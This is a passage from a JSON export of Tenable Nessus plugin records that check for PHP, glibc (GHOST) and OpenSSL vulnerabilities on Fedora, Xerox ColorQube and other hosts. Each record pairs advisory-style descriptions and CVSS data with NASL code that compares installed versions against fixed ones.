between threads). (Martin Jansen)\n\nOpenSSL :\n\n - Fixed bug #55618 (use case-insensitive cert name matching). (Daniel Lowrey)\n\nPDO_mysql :\n\n - Fixed bug #68750 (PDOMysql with mysqlnd does not allow the usage of named pipes). (steffenb198 at aol.com)\n\nPhar :\n\n - Fixed bug #68901 (use after free). (bugreports at internot dot info)\n\nPgsql :\n\n - Fixed Bug #65199 'pg_copy_from() modifies input array variable). (Yasuo)\n\nSqlite3 :\n\n - Fixed bug #68260 (SQLite3Result::fetchArray declares wrong required_num_args). (Julien)\n\nMysqli :\n\n - Fixed bug #68114 (linker error on some OS X machines with fixed width decimal support) (Keyur Govande)\n\n - Fixed bug #68657 (Reading 4 byte floats with Mysqli and libmysqlclient has rounding errors) (Keyur Govande)\n\nSession :\n\n - Fixed bug #68941 (mod_files.sh is a bash-script) (bugzilla at ii.nl, Yasuo)\n\n - Fixed Bug #66623 (no EINTR check on flock) (Yasuo)\n\n - Fixed bug #68063 (Empty session IDs do still start sessions) (Yasuo)\n\nStandard :\n\n - Fixed bug #65272 (flock() out parameter not set correctly in windows). (Daniel Lowrey)\n\n - Fixed bug #69033 (Request may get env. variables from previous requests if PHP works as FastCGI)\n\nStreams :\n\n - Fixed bug which caused call after final close on streams filter. (Bob)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-03-05T00:00:00", "type": "nessus", "title": "Fedora 20 : php-5.5.22-1.fc20 (2015-2328)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235", "CVE-2015-0273"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2015-2328.NASL", "href": "https://www.tenable.com/plugins/nessus/81612", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-2328.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81612);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_bugtraq_id(64225, 67118, 72325, 72701);\n script_xref(name:\"FEDORA\", value:\"2015-2328\");\n\n script_name(english:\"Fedora 20 : php-5.5.22-1.fc20 (2015-2328)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"19 Feb 2015, PHP 5.5.22\n\nCore :\n\n - Fixed bug #67068 (getClosure returns somethings that's\n not a closure). (Danack at basereality dot com)\n\n - Fixed bug #68925 (Mitigation for CVE-2015-0235 '\n GHOST: glibc gethostbyname buffer overflow). (Stas)\n\n - Fixed bug #68942 (Use after free vulnerability in\n unserialize() with DateTimeZone). (CVE-2015-0273)\n (Stas)\n\n - Added NULL byte protection to exec, system and\n passthru. (Yasuo)\n\n - Removed support for multi-line headers, as the are\n deprecated by RFC 7230. (Stas)\n\nDate :\n\n - Fixed bug #45081 (strtotime incorrectly interprets SGT\n time zone). (Derick)\n\nDba :\n\n - Fixed bug #68711 (useless comparisons). (bugreports at\n internot dot info)\n\nEnchant :\n\n - Fixed bug #6855 (heap buffer overflow in\n enchant_broker_request_dict()). (Antony)\n\nFileinfo :\n\n - Fixed bug #68827 (Double free with disabled ZMM).\n (Joshua Rogers)\n\nFPM :\n\n - Fixed bug #66479 (Wrong response to FCGI_GET_VALUES).\n (Frank Stolle)\n\n - Fixed bug #68571 (core dump when webserver close the\n socket). (redfoxli069 at gmail dot com, Laruence)\n\nLibxml :\n\n - Fixed bug #64938 (libxml_disable_entity_loader setting\n is shared between threads). (Martin Jansen)\n\nOpenSSL :\n\n - Fixed bug #55618 (use case-insensitive cert name\n matching). (Daniel Lowrey)\n\nPDO_mysql :\n\n - Fixed bug #68750 (PDOMysql with mysqlnd does not allow\n the usage of named pipes). (steffenb198 at aol.com)\n\nPhar :\n\n - Fixed bug #68901 (use after free). (bugreports at\n internot dot info)\n\nPgsql :\n\n - Fixed Bug #65199 'pg_copy_from() modifies input array\n variable). (Yasuo)\n\nSqlite3 :\n\n - Fixed bug #68260 (SQLite3Result::fetchArray declares\n wrong required_num_args). (Julien)\n\nMysqli :\n\n - Fixed bug #68114 (linker error on some OS X machines\n with fixed width decimal support) (Keyur Govande)\n\n - Fixed bug #68657 (Reading 4 byte floats with Mysqli\n and libmysqlclient has rounding errors) (Keyur\n Govande)\n\nSession :\n\n - Fixed bug #68941 (mod_files.sh is a bash-script)\n (bugzilla at ii.nl, Yasuo)\n\n - Fixed Bug #66623 (no EINTR check on flock) (Yasuo)\n\n - Fixed bug #68063 (Empty session IDs do still start\n sessions) (Yasuo)\n\nStandard :\n\n - Fixed bug #65272 (flock() out parameter not set\n correctly in windows). (Daniel Lowrey)\n\n - Fixed bug #69033 (Request may get env. variables from\n previous requests if PHP works as FastCGI)\n\nStreams :\n\n - Fixed bug which caused call after final close on streams\n filter. (Bob)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/150624.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3c7c73c8\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"php-5.5.22-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-11T15:05:25", "description": "According to its model number and software version, the remote Xerox ColorQube device is affected by multiple OpenSSL vulnerabilities :\n\n - A man-in-the-middle (MitM) information disclosure vulnerability, known as POODLE, exists due to the way SSL 3.0 handles padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. A MitM attacker can decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections.\n (CVE-2014-3566)\n\n - A security feature bypass vulnerability, known as FREAK (Factoring attack on RSA-EXPORT Keys), exists due to the support of weak EXPORT_RSA cipher suites with keys less than or equal to 512 bits. A man-in-the-middle attacker may be able to downgrade the SSL/TLS connection to use EXPORT_RSA cipher suites which can be factored in a short amount of time, allowing the attacker to intercept and decrypt the traffic. (CVE-2015-0204)\n\n - A heap-based buffer overflow condition exists in the GNU C Library (glibc) due to improper validation of user-supplied input to the glibc functions\n __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2(). This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. This vulnerability is known as GHOST. (CVE-2015-0235)", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 3.4, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2015-12-11T00:00:00", "type": "nessus", "title": "Xerox ColorQube 92XX Multiple OpenSSL Vulnerabilities (XRX15AD) (FREAK) (GHOST) (POODLE)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3566", "CVE-2015-0204", "CVE-2015-0235"], "modified": "2019-11-20T00:00:00", "cpe": ["cpe:/h:xerox:colorqube"], "id": "XEROX_XRX15AD_COLORQUBE.NASL", "href": "https://www.tenable.com/plugins/nessus/87322", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87322);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/20\");\n\n script_cve_id(\"CVE-2014-3566\", \"CVE-2015-0204\", \"CVE-2015-0235\");\n script_bugtraq_id(70574, 71936, 72325);\n script_xref(name:\"CERT\", value:\"243585\");\n script_xref(name:\"CERT\", value:\"577193\");\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"Xerox ColorQube 92XX Multiple OpenSSL Vulnerabilities (XRX15AD) (FREAK) (GHOST) (POODLE)\");\n script_summary(english:\"Checks system software version of Xerox ColorQube devices.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote multi-function device is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its model number and software version, the remote Xerox\nColorQube device is affected by multiple OpenSSL vulnerabilities :\n\n - A man-in-the-middle (MitM) information disclosure\n vulnerability, known as POODLE, exists due to the way\n SSL 3.0 handles padding bytes when decrypting messages\n encrypted using block ciphers in cipher block chaining\n (CBC) mode. A MitM attacker can decrypt a selected byte\n of a cipher text in as few as 256 tries if they are able\n to force a victim application to repeatedly send the\n same data over newly created SSL 3.0 connections.\n (CVE-2014-3566)\n\n - A security feature bypass vulnerability, known as FREAK\n (Factoring attack on RSA-EXPORT Keys), exists due to the\n support of weak EXPORT_RSA cipher suites with keys less\n than or equal to 512 bits. A man-in-the-middle attacker\n may be able to downgrade the SSL/TLS connection to use\n EXPORT_RSA cipher suites which can be factored in a\n short amount of time, allowing the attacker to intercept\n and decrypt the traffic. (CVE-2015-0204)\n\n - A heap-based buffer overflow condition exists in the GNU\n C Library (glibc) due to improper validation of\n user-supplied input to the glibc functions\n __nss_hostname_digits_dots(), gethostbyname(), and\n gethostbyname2(). This allows a remote attacker to cause\n a buffer overflow, resulting in a denial of service\n condition or the execution of arbitrary code. This\n vulnerability is known as GHOST. (CVE-2015-0235)\");\n # https://www.xerox.com/download/security/security-bulletin/27a16-51ca83a45a218/cert_Security_Mini-_Bulletin_XRX15AD_for_CQ92xx_v1-0a.pdf\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7240b740\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imperialviolet.org/2014/10/14/poodle.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.smacktls.com/#freak\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate cumulative update as described in the Xerox\nsecurity bulletin in the referenced URL.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/08/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:xerox:colorqube\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"xerox_colorqube_detect.nbin\");\n script_require_keys(\"www/xerox_colorqube\", \"www/xerox_colorqube/model\", \"www/xerox_colorqube/ssw\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Get model and system software version\nmodel = get_kb_item_or_exit(\"www/xerox_colorqube/model\");\nver = get_kb_item_or_exit(\"www/xerox_colorqube/ssw\");\n\n# 92XX only affected\nif (model !~ \"^92[0-9][0-9]$\")\n audit(AUDIT_HOST_NOT, \"an affected Xerox ColorQube model\");\n\nif (ver =~ \"^[0-9]+\\.050\\.\")\n{\n # CBC\n fix = \"061.050.225.18900\";\n}\nelse if (ver =~ \"^[0-9]+\\.080\\.\")\n{\n # SBC\n fix = \"061.080.225.18900\";\n}\nelse\n audit(AUDIT_INST_VER_NOT_VULN, \"Xerox ColorQube \" + model + \" System SW\", ver);\n\nif (ver_compare(ver:ver, fix:fix, strict:FALSE) >= 0)\n audit(AUDIT_INST_VER_NOT_VULN, \"Xerox ColorQube \" + model + \" System SW\", ver);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Model : Xerox ColorQube ' + model +\n '\\n Installed system software version : ' + ver +\n '\\n Fixed system software version : ' + fix + '\\n';\n security_hole(port:0, extra:report);\n}\nelse security_hole(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:45", "description": "According to its banner, the version of PHP 5.4.x installed on the remote host is prior to 5.4.38. It is, therefore, affected by multiple vulnerabilities :\n\n - A heap-based buffer overflow flaw in the enchant_broker_request_dict function in ext/enchant/enchant.c could allow a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2014-9705)\n\n - A heap-based buffer overflow flaw in the GNU C Library (glibc) due to improperly validating user-supplied input in the glibc functions __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2(). This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-0235)\n\n - A use-after-free flaw exists in the function php_date_timezone_initialize_from_hash() within the 'ext/date/php_date.c' script. An attacker can exploit this to access sensitive information or crash applications linked to PHP. (CVE-2015-0273)\n\nNote that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2015-02-25T00:00:00", "type": "nessus", "title": "PHP 5.4.x < 5.4.38 Multiple Vulnerabilities (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9705", "CVE-2015-0235", "CVE-2015-0273"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_4_38.NASL", "href": "https://www.tenable.com/plugins/nessus/81510", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81510);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-9705\", \"CVE-2015-0235\", \"CVE-2015-0273\");\n script_bugtraq_id(72325, 72701, 73031);\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"PHP 5.4.x < 5.4.38 Multiple Vulnerabilities (GHOST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP 5.4.x installed on the\nremote host is prior to 5.4.38. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A heap-based buffer overflow flaw in the\n enchant_broker_request_dict function in\n ext/enchant/enchant.c could allow a remote attacker\n to cause a buffer overflow, resulting in\n a denial of service condition or the execution of\n arbitrary code. (CVE-2014-9705)\n\n - A heap-based buffer overflow flaw in the GNU C Library\n (glibc) due to improperly validating user-supplied input\n in the glibc functions __nss_hostname_digits_dots(),\n gethostbyname(), and gethostbyname2(). This allows a\n remote attacker to cause a buffer overflow, resulting in\n a denial of service condition or the execution of\n arbitrary code. (CVE-2015-0235)\n\n - A use-after-free flaw exists in the function\n php_date_timezone_initialize_from_hash() within the\n 'ext/date/php_date.c' script. An attacker can exploit\n this to access sensitive information or crash\n applications linked to PHP. (CVE-2015-0273)\n\nNote that Nessus has not attempted to exploit these issues but has\ninstead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-5.php#5.4.38\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.php.net/bug.php?id=68925\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.php.net/bug.php?id=68942\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 5.4.38 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^5(\\.4)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^5\\.4\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 5.4.x\", port);\n\nif (version =~ \"^5\\.4\\.([0-9]|[12][0-9]|3[0-7])($|[^0-9])\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version +\n '\\n Fixed version : 5.4.38' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-18T15:22:58", "description": "Versions of PHP 5.4.x earlier than 5.4.38, 5.5.x earlier than 5.5.22, or 5.6.x earlier than 5.6.6 are exposed to the following issues :\n\n - A heap-based buffer overflow flaw in the GNU C Library (glibc) due to improperly validating user-supplied input in the glibc functions __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2(). This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (GHOST) (Bug 68925 / CVE-2015-0235)\n\n - A use-after-free flaw exists in the function php_date_timezone_initialize_from_hash() within the 'ext/date/php_date.c' script. An attacker can exploit this to access sensitive information or crash applications linked to PHP. (Bug 68942 / CVE-2015-0273)\n\n - A use-after-free flaw exists in the function 'phar_rename_archive' in the source file 'phar_object.c'. An attacker can cause a denial of service or possibly have unspecified other impact via vectors that trigger an attempted renaming of a Phar archive to the name of an existing file. (Bug 68901 / CVE-2015-2301)\n\n - A heap-based buffer overflow flaw affects the 'enchant_broker_request_dict' function in the source file 'ext/enchant/enchant.c'. This allows remote attackers to execute arbitrary code via vectors that trigger creation of multiple dictionaries. (Bug 68552 / CVE-2014-9705) ", "cvss3": {}, "published": "2015-04-09T00:00:00", "type": "nessus", "title": "PHP 5.4.x < 5.4.38 / 5.5.x < 5.5.22 / 5.6.x < 5.6.6 Multiple Vulnerabilities (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9705", "CVE-2015-0235", "CVE-2015-0273", "CVE-2015-2301"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "8677.PRM", "href": "https://www.tenable.com/plugins/nnm/8677", "sourceData": "Binary data 8677.prm", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:44:26", "description": "According to its banner, the version of PHP 5.6.x installed on the remote host is prior to 5.6.6. It is, therefore, affected by multiple vulnerabilities :\n\n - A heap-based buffer overflow flaw in the GNU C Library (glibc) due to improperly validating user-supplied input in the glibc functions __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2(). This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-0235)\n\n - A use-after-free flaw exists in the function php_date_timezone_initialize_from_hash() within the 'ext/date/php_date.c' script. An attacker can exploit this to access sensitive information or crash applications linked to PHP. (CVE-2015-0273)\n\n - An XML External Entity (XXE) flaw exists in the PHP-FPM component due to improper parsing of XML data. A remote attacker can exploit this, via specially crafted XML data, to disclose sensitive information or cause a denial of service. (CVE-2015-8866)\n\nNote that the scanner has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2019-01-09T00:00:00", "type": "nessus", "title": "PHP 5.6.x < 5.6.6 Multiple Vulnerabilities (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9705", "CVE-2015-0235", "CVE-2015-0273", "CVE-2015-8866"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:php:php:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98829", "href": "https://www.tenable.com/plugins/was/98829", "sourceData": "No source data", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T00:25:01", "description": "According to the versions of the glibc packages installed, the EulerOS Virtualization for ARM 64 installation on the remote host is affected by the following vulnerabilities :\n\n - stdlib/canonicalize.c in the GNU C Library (aka glibc or libc6) 2.27 and earlier, when processing very long pathname arguments to the realpath function, could encounter an integer overflow on 32-bit architectures, leading to a stack-based buffer overflow and, potentially, arbitrary code execution.(CVE-2018-11236)\n\n - An AVX-512-optimized implementation of the mempcpy function in the GNU C Library (aka glibc or libc6) 2.27 and earlier may write data beyond the target buffer, leading to a buffer overflow in\n __mempcpy_avx512_no_vzeroupper.(CVE-2018-11237)\n\n - elf/dl-load.c in the GNU C Library (aka glibc or libc6) 2.19 through 2.26 mishandles RPATH and RUNPATH containing $ORIGIN for a privileged (setuid or AT_SECURE) program, which allows local users to gain privileges via a Trojan horse library in the current working directory, related to the fillin_rpath and decompose_rpath functions. This is associated with misinterpretion of an empty RPATH/RUNPATH token as the './' directory. NOTE: this configuration of RPATH/RUNPATH for a privileged program is apparently very uncommon most likely, no such program is shipped with any common Linux distribution.(CVE-2017-16997)\n\n - A 